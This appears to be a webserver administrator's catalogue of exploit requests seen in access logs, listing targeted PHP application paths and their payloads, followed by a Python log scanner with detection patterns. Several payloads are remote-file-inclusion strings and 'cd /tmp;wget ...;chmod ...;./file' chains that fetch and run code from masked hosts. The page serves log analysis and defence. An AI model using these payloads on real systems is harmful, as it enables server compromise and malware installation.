System: WWW Hacker Activity
At any given time there are thousands of computers sending out requests designed to compromise a web server or website by exploiting vulnerabilities in various software packages and programming languages. This comes on top of brute-force ssh attacks and other non-HTTP techniques.
The difference between now and earlier years is that many of these computers have actually been compromised themselves and turned into 'zombie' servers controlled by yet another server and so on. The 'controller' of a zombie network may receive notification when a server has been compromised, or the system could be completely automated and designed simply to spread as far as possible.
The following entries will give you an idea of what kind of exploits are about and what to look for in your webserver logs. If you're not running the targeted software packages then you (probably) don't need to be too concerned. You may still want to use mod_rewrite to send a 403 Forbidden or similar response, but that would just be to reduce bandwidth.
If you are running one or more of these packages then make sure you keep up to date with upgrades and patches. Where possible we've included a link to the product homepage and/or security announcements.
Note: This list is by no means comprehensive and should be used for information purposes only.
PHPMyAdmin
- Target
- PHPMyAdmin
- Files Requested
- /PMA/main.php
/admin/main.php
/admin/mysql/main.php
/admin/phpmyadmin/main.php
/admin/pma/main.php
/db/main.php
/dbadmin/main.php
/main.php
/myadmin/main.php
/mysql-admin/main.php
/mysql/main.php
/mysqladmin/main.php
/phpMyAdmin-2.2.3/main.php
/phpMyAdmin-2.2.6/main.php
/phpMyAdmin-2.5.1/main.php
/phpMyAdmin-2.5.4/main.php
/phpMyAdmin-2.5.6/main.php
/phpmyadmin/main.php
/phpmyadmin2/main.php
/web/phpMyAdmin/main.php
/PMA/read_dump.php
/db/read_dump.php
/dbadmin/read_dump.php
/myadmin/read_dump.php
/mysql/read_dump.php
/mysqladmin/read_dump.php
/phpMyAdmin%202.6.4-pl4/read_dump.php
/phpMyAdmin%202.7.0-beta1/read_dump.php
/phpMyAdmin%202.7.0-pl1/read_dump.php
/phpMyAdmin%202.7.0-rc1/read_dump.php
/phpMyAdmin%202.7.0/read_dump.php
/phpMyAdmin-2.2.3/read_dump.php
/phpMyAdmin-2.2.7-pl1/read_dump.php
/phpMyAdmin-2.5.6/read_dump.php
/phpMyAdmin-2.5.7-pl1/read_dump.php
/phpMyAdmin-2.6.0-pl3/read_dump.php
/phpMyAdmin-2.6.0/read_dump.php
/phpMyAdmin-2.6.1-pl3/read_dump.php
/phpMyAdmin-2.6.3-pl1/read_dump.php
/phpMyAdmin-2.6.4/read_dump.php
/phpadmin/read_dump.php
/phpmyadmin/read_dump.php
/phpmyadmin1/read_dump.php
/phpmyadmin2/read_dump.php
/typo3/phpmyadmin/read_dump.php
/web/phpMyAdmin/read_dump.php
/xampp/phpmyadmin/read_dump.php
- Payload
- None - there's probably a followup scan/attack
- Security
- https://www.phpmyadmin.net/home_page/security.php
Various PHP applications
- Target
- Various PHP applications - seems to be an extension of Mambo exploit below, but with more target files
- Files Requested
- /DE/index2.php
/FR/index2.php
/NL/index2.php
/US/index2.php
/cms/index.php
/cms/index2.php
/cvs/index.php
/cvs/index2.php
/index.php
/index2.php
/mambo/index.php
/mambo/index2.php
/mb/index.php
/mb/index2.php
/site/index2.php
/v1/index2.php
/v2/index2.php
/v3/index2.php
- Payload
- POST data
phpBB
- Target
- phpBB
- Files Requested
- /modules/Forums/admin/admin_styles.php
/Forums/admin/admin_styles.php
/includes/functions.php
/includes/functions_nomoketos_rules.php
/modules/Forums/admin/admin_mass_email.php
/modules/Forums/admin/index.php
- Payload
- phpbb_root_path=http://XXX.XXX.XX.XX/cmd.dat?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|
- Security
- https://www.phpbb.com/security/
Coppermine
- Target
- Coppermine
- Files Requested
- /modules/coppermine/themes/default/theme.php
- Payload
- THEME_DIR=http://XXX.XXX.XX.XX/cmd.gif?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|
Mambo/Joomla Content Management System
- Target
- Mambo Content Management System
Joomla Content Management System
- Files Requested
- /index.php
/index2.php
/mambo/index2.php
/cvs/index2.php
/cvs/mambo/index2.php
/php/mambo/index2.php
/cbcms/mod_cbsms_messages.php
/components/com_extcalendar/admin_events.php
/components/com_forum/download.php
/components/com_galleria/galleria.html.php
/components/com_hashcash/server.php
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
/components/com_loudmounth/includes/abbc/abbc.class.php
/components/com_pcchess/include.pcchess.php
/components/com_pccookbook/pccookbook.php
/components/com_performs/performs.php
/components/com_pollxt/conf.pollxt.php
/components/com_rsgallery2/rsgallery.html.php
/components/com_smf/smf.php
/components/com_simpleboard/file_upload.php
/components/com_sitemap/sitemap.xml.php
/components/com_videodb/core/videodb.class.xml.php
/mod_cbsms_messages.php
- Payload
- _REQUEST[option]=com_content
_REQUEST[Itemid]=1
GLOBALS=
mosConfig_absolute_path=http://XXX.XXX.XX.XX/cmd.gif?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
CONFIG_EXT[LANGUAGES_DIR]=http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
phpbb_root_path=http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
- Security
- http://forum.mamboserver.com/forumdisplay.php?f=216
Wordpress, Drupal and other PHP applications
- Target
- Wordpress, Drupal and other PHP applications
- Files Requested
- /blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
- Payload
- POST data
- Security
- https://www.php.net/
AWStats
- Target
- AWStats
- Files Requested
- /awstats/awstats.pl
/cgi-bin/awstats.pl
/cgi-bin/awstats/awstats.pl
- Payload
- configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20XXX%2eXXX%2eXX%2eXX%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|
- Security
- https://awstats.sourceforge.io/awstats_security_news.php
Microsoft Applications/Extensions
- Target
- Microsoft Applications/Extensions (may be benign)
- Files Requested
- /5c/_vti_bin/owssvr.dll
/5c/MSOffice/cltreq.asp
- Payload
- UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0
Note: The following exploits were ALL attempted on various sites on our server from the same IP address on 29 March 2007 with the User Agent "Morfeus Fucking Scanner" which seems to be some kind of high-powered PHP exploiting robot.
DBImageGallery
- Target
- DBImageGallery
- Files Requested
- /admin/attributes.php
/admin/images.php
/admin/scan.php
/includes/attributes.php
/includes/db_utils.php
/includes/images.php
/includes/utils.php
/includes/values.php
- Payload
- donsimg_base_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
- Security
- https://www.dbscripts.net/imagegallery/history.php
DBGuestbook
- Target
- DBGuestbook
- Files Requested
- /includes/guestbook.php
/includes/utils.php
/includes/views.php
- Payload
- dbs_base_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Ultimate Fun Book
- Target
- Ultimate Fun Book
- Files Requested
- /board//function.php
/funboard/function.php
/function.php
- Payload
- gbpfad=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Back-End.org CMS
- Target
- Back-End.org CMS
- Files Requested
- /BE_config.php
- Payload
- _PSL[classdir]=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Sinapis Forum CMS
- Target
- Sinapis Forum CMS
- Files Requested
- /sinapis.php
/forum//sinapis.php
/FO/sinapis.php
- Payload
- fuss=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
- Security
Admin Phorum
- Target
- PhpForums Admin Phorum
- Files Requested
- /actions/del.php
- Payload
- include_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
eFiction
- Target
- eFiction
- Files Requested
- /bridges/SMF/logout.php
/get_session_vars.php
- Payload
- path_to_smf=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
PMB Services
- Target
- PMB Services
- Files Requested
- /cnl_prod/pmb/opac_css/includes/resa_func.inc.php
/pmb/opac_css/includes/resa_func.inc.php
/opac_css/includes/resa_func.inc.php
- Payload
- class_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
AgerMenu
- Target
- AgerMenu
- Files Requested
- /example/inc/top.inc.php
- Payload
- rootdir=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Fast Click
- Target
- Fast Click
- Files Requested
- /fclick/show.php
- Payload
- path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
FCRing
- Target
- FCRing
- Files Requested
- /fcring.php
- Payload
- s_fuss=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
PHP-MIP
- Target
- PHP-MIP
- Files Requested
- /php/top.php
/phpmip//top.php
/top.php
- Payload
- laypath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
SendStudio
- Target
- SendStudio
- Files Requested
- /sendstudio/admin/includes/createemails.inc.php
/sendstudio/admin/includes/send_emails.inc.php
- Payload
- ROOTDIR=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Not Yet Classified
/forum/index.php?func=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/index.php?func=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/index.php?page=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/live/help.php?css_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/modules/My_eGallery/public/displayCategory.php?adminpath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/phorum/common.php?db_file=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/skins/advanced/advanced1.php?pluginpath[0]=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
/ubbthreads/addpost_newpoll.php?addpoll=preview&thispath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Note: The following exploits were attempted by user agent Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0) - from Russia with love.
/components/com_simpleboard/file_upload.php?sbp=http://XXXXXX.ru/r57.txt?
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt?
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt?
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt?
/modules/MambWeather/Savant2/main.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt?
/components/com_joomlaboard/file_upload.php?sbp=http://XXXXXX.ru/r57.txt?
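Nearly every payload listed above has one of two shapes: an include-path parameter set to a remote URL with a trailing "?" (the remote file inclusion itself), or a cmd-style parameter carrying a cd /tmp;wget ...;chmod ... chain. The script below is an added example, not part of the original page, that picks both shapes out of Apache combined-format access-log lines; the log lines and IP addresses in it are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines modelled on the request shapes listed on
# this page; the addresses are documentation ranges, not real attacker hosts.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Mar/2007:10:01:02 +0000] "GET /index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://198.51.100.7/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.7/micu;chmod%20744%20micu;./micu;echo%20YYY;echo HTTP/1.1" 404 210 "-" "Mozilla/4.0"
203.0.113.5 - - [29/Mar/2007:10:01:03 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198.51.100.7%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 210 "-" "Morfeus Fucking Scanner"
203.0.113.5 - - [29/Mar/2007:10:01:04 +0000] "GET /includes/utils.php?dbs_base_path=http://198.51.100.9/~lisir/M.txt?&/ HTTP/1.1" 404 210 "-" "Morfeus Fucking Scanner"
192.0.2.44 - - [29/Mar/2007:10:02:00 +0000] "GET /index.php?page=about&ref=http://example.com/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# client ident user [time] "METHOD URL PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Rule 1: a full URL with a trailing '?', which turns whatever the vulnerable
# script appends to its include path into a harmless query string.
RFI_RE = re.compile(r'^(?:https?|ftp)://[^?\s]+\?', re.I)
# Rule 2: a 'cd /tmp;wget ...;chmod ...' style chain at the start of a value or
# after a shell command separator.
SHELL_RE = re.compile(r'(?:^|[;|&`]\s*)(?:cd\s+/tmp|wget\s|curl\s|chmod\s)', re.I)

def split_query(url):
    """Split a request URL into its path and decoded (name, value) pairs."""
    # Split on '&' only: parse_qsl on older Pythons also splits on ';', which
    # would tear the command chains matched by rule 2 apart before inspection.
    path, _, query = url.partition('?')
    pairs = []
    for item in query.split('&'):
        if item:
            name, _, value = item.partition('=')
            pairs.append((unquote(name), unquote(value)))
    return path, pairs

def scan_log(text):
    """Return one finding per suspicious query parameter in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, method, url, status, agent = m.groups()
        path, pairs = split_query(url)
        for name, value in pairs:
            kind = ('remote-file-inclusion' if RFI_RE.match(value) else
                    'shell-command-chain' if SHELL_RE.search(value) else None)
            if kind:
                findings.append({'ip': ip, 'agent': agent, 'method': method,
                                 'status': int(status), 'path': path,
                                 'param': name, 'kind': kind})
    return findings
```

The fourth sample line, a legitimate referer-style parameter, is not flagged because the URL has no trailing "?"; on a real log you would group the findings by source IP to see the scan runs described above.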